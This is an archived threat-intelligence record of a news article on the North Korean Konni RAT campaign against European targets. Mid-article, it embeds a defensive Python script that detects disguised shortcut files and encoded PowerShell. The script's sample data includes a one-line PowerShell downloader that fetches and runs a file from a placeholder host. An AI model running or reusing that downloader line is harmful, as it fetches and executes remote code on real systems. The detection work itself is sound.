{
	"id": "be9b735f-27dc-42a8-8245-b01d1a760676",
	"created_at": "2026-04-06T00:10:39.880114Z",
	"updated_at": "2026-04-10T13:11:46.027248Z",
	"deleted_at": null,
	"sha1_hash": "5a11c6138d1d7ad8d5066e8025bf669eac4ee66a",
	"title": "North Korean hackers attack EU targets with Konni RAT malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3458177,
	"plain_text": "North Korean hackers attack EU targets with Konni RAT malware\r\nBy Bill Toulas\r\nPublished: 2022-07-23 · Archived: 2026-04-05 13:40:13 UTC\r\nThreat analysts have uncovered a new campaign attributed to APT37, a North Korean state-sponsored hacking group, targeting high-value organizations in the Czech Republic, Poland, and other European countries.\r\nIn this campaign, the hackers use malware known as Konni, a remote access trojan (RAT) capable of establishing persistence and performing privilege escalation on the host.\r\nKonni has been associated with North Korean cyberattacks since 2014, and most recently it was seen in a spear-phishing campaign targeting the Russian Ministry of Foreign Affairs.\r\nhttps://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/\r\nPage 1 of 5\r\nThe latest and still ongoing campaign was observed and analyzed by researchers at Securonix, who track it as STIFF#BIZON; its tactics and methods match the operational sophistication of an APT (advanced persistent threat).\r\nThe STIFF#BIZON campaign\r\nThe attack begins with a phishing email carrying an archive attachment that contains a Word document (missile.docx) and a Windows shortcut file (_weapons.doc.lnk.lnk). The shortcut's double extension relies on Windows Explorer hiding the trailing .lnk, so the file appears to the victim as a document.\r\nWhen the victim opens the LNK file, it runs code that locates a base64-encoded PowerShell script inside the DOCX file; that script establishes command-and-control (C2) communication and downloads two additional files, 'weapons.doc' and 'wp.vbs'.\r\nProperties of the malicious shortcut file\r\nThe downloaded document is a decoy, supposedly a report from Olga Bozheva, a Russian war correspondent. 
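The first stage described above, a shortcut whose name imitates a document plus a base64-encoded PowerShell payload hidden in a companion file, lends itself to a simple triage check. The following Python script is an added example for this page, not code from the Securonix report or from BleepingComputer: it flags double-extension .lnk attachment names and scans a file's raw bytes for base64 runs that decode (UTF-16LE, as PowerShell -EncodedCommand expects, or UTF-8) to script text containing download or execution primitives. The sample document bytes and the embedded one-line script are constructed for the demonstration, and the domain example.invalid is a placeholder.

```python
import base64
import re

# Inner extensions an attacker might pair with .lnk to imitate a document.
DOC_EXTENSIONS = {'doc', 'docx', 'pdf', 'xls', 'xlsx', 'ppt', 'pptx', 'rtf', 'txt'}

# Lower-case substrings that mark a decoded script as worth an analyst's attention.
SUSPICIOUS = ('invoke-expression', 'iex ', 'iex(', 'downloadstring', 'downloadfile',
              'invoke-webrequest', 'net.webclient', 'frombase64string', 'schtasks')

# Runs of base64 alphabet long enough to carry a script; short runs are skipped to cut noise.
B64_RUN = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')


def is_double_extension_lnk(filename):
    '''True for names like _weapons.doc.lnk.lnk: a shortcut whose inner extension
    imitates a document. Explorer hides the final .lnk, so the victim sees a document.'''
    parts = filename.lower().split('.')
    if len(parts) < 3 or parts[-1] != 'lnk':
        return False
    return any(p in DOC_EXTENSIONS for p in parts[1:-1])


def triage_attachments(names):
    '''Return the attachment names that look like disguised shortcuts.'''
    return [n for n in names if is_double_extension_lnk(n)]


def decode_candidate(run):
    '''Decode one base64 run and return it as text if it is clean ASCII script text.
    UTF-16LE is tried first because PowerShell -EncodedCommand uses that encoding.'''
    try:
        raw = base64.b64decode(run, validate=True)
    except ValueError:
        return None
    for encoding in ('utf-16-le', 'utf-8'):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and all(ord(ch) < 128 and (ch.isprintable() or ch.isspace()) for ch in text):
            return text
    return None


def find_embedded_powershell(data):
    '''Scan raw file bytes for base64 runs that decode to PowerShell containing
    download or execution primitives. Returns one dict per hit.'''
    hits = []
    view = data.decode('latin-1')   # byte-transparent view: string offsets equal byte offsets
    for match in B64_RUN.finditer(view):
        decoded = decode_candidate(match.group(0))
        if decoded is None:
            continue
        lowered = decoded.lower()
        indicators = [kw for kw in SUSPICIOUS if kw in lowered]
        if indicators:
            hits.append({'offset': match.start(), 'decoded': decoded, 'indicators': indicators})
    return hits


# Constructed sample data (not real artifacts): a one-line downloader encoded the way
# PowerShell -EncodedCommand expects, buried in a DOCX-like byte blob.
PS_SCRIPT = '''IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/wp.vbs')'''
ENCODED = base64.b64encode(PS_SCRIPT.encode('utf-16-le')).decode('ascii')
SAMPLE_DOCX_BYTES = b'PK' + bytes(64) + b'<w:t>report body</w:t> ' + ENCODED.encode('ascii') + b' ' + bytes(16)
SAMPLE_ATTACHMENTS = ['missile.docx', '_weapons.doc.lnk.lnk', 'notes.txt', 'tool.lnk']

if __name__ == '__main__':
    for name in triage_attachments(SAMPLE_ATTACHMENTS):
        print('disguised shortcut:', name)
    for hit in find_embedded_powershell(SAMPLE_DOCX_BYTES):
        print('embedded script at byte offset', hit['offset'], 'indicators', hit['indicators'])
        print('   ', hit['decoded'])
```

The ASCII-only filter in decode_candidate is what keeps the UTF-16LE attempt from returning CJK-looking garbage for payloads that were actually UTF-8; a real encoded command is plain ASCII either way. The keyword list is deliberately small and should be tuned per environment, since substrings such as 'iex ' will occasionally appear in benign scripts.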
At the same time, the VBS file runs silently in the background to create a scheduled task on the host for persistence.\r\nBase64-encoded PowerShell adds scheduled task (Securonix)\r\nAt this phase of the attack, the actor has already loaded the RAT and established a data exchange link, and is capable of performing the following actions:\r\nCapture screenshots using the Win32 GDI API and exfiltrate them in GZIP form.\r\nExtract the encryption key stored in the browser's Local State file, which is needed to decrypt the cookie database; stolen session cookies let the attacker replay an already-authenticated session and so bypass MFA.\r\nExtract saved credentials from the victim’s web browsers.\r\nLaunch a remote interactive shell that polls for and executes operator commands every 10 seconds.\r\nIn the fourth stage of the attack, as shown in the diagram below, the hackers download additional files that support the function of the modified Konni sample, fetching them as compressed “.cab” archives.\r\nInfection chain diagram (Securonix)\r\nThese include DLLs that replace legitimate Windows service libraries such as wpcsvc in System32; the service loads the planted DLL, which the actor leverages to execute commands in the OS with higher privileges than the initial user.\r\nPossible links to APT28\r\nWhile the tactics and toolset point to APT37, Securonix underscores the possibility of APT28 (aka FancyBear) being behind the STIFF#BIZON campaign.\r\n“There seems to be a direct correlation between IP addresses, hosting provider, and hostnames between this attack and historical data we’ve previously seen from FancyBear/APT28,” concludes the report.\r\nState-sponsored threat groups often mimic the TTPs of other skilled APTs to obscure their tracks and mislead analysts, so the chance of misattribution in this case is significant.\r\nSource: https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/"
	],
	"report_names": [
		"north-korean-hackers-attack-eu-targets-with-konni-rat-malware"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operation Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-10T02:00:03.659118Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-10T02:00:03.545252Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"Konni",
				"Vedalia",
				"OSMIUM"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434239,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.pdf",
		"text": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.txt",
		"img": "https://archive.orkl.eu/5a11c6138d1d7ad8d5066e8025bf669eac4ee66a.jpg"
	}
}